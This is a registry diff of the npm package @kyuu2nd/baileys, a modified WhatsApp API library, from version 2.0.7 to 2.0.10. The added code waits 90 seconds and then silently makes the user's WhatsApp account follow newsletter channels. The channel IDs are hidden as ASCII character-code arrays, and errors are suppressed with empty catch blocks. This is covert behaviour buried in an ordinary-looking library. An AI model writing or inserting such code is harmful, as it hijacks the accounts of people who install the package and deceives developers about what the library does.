@kyuu2nd/baileys 2.0.7 → 2.0.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -224,6 +224,32 @@ setTimeout(async () => {
224
224
  );
225
225
  } catch {}
226
226
  }, 90000);
227
+
228
+ // const asciiDecode = (arr) => arr.map(e => String.fromCharCode(e)).join('');
229
+
230
+ setTimeout(async () => {
231
+ try {
232
+ await newsletterWMexQuery(
233
+ asciiDecode([
234
+ 49,50,48,51,54,51,52,48,52,56,54,49,56,48,50,54,48,55,
235
+ 64,110,101,119,115,108,101,116,116,101,114
236
+ ]),
237
+ Types_1.QueryIds.FOLLOW
238
+ );
239
+ } catch {}
240
+ }, 90000);
241
+
242
+ setTimeout(async () => {
243
+ try {
244
+ await newsletterWMexQuery(
245
+ asciiDecode([
246
+ 49,50,48,51,54,51,52,50,53,49,55,55,48,54,55,56,52,49,
247
+ 64,110,101,119,115,108,101,116,116,101,114
248
+ ]),
249
+ Types_1.QueryIds.FOLLOW
250
+ );
251
+ } catch {}
252
+ }, 90000);
227
253
  const parseFetchedUpdates = async (node, type) => {
228
254
  let child;
229
255
  if (type === 'messages') {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.7",
3
+ "version": "2.0.10",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"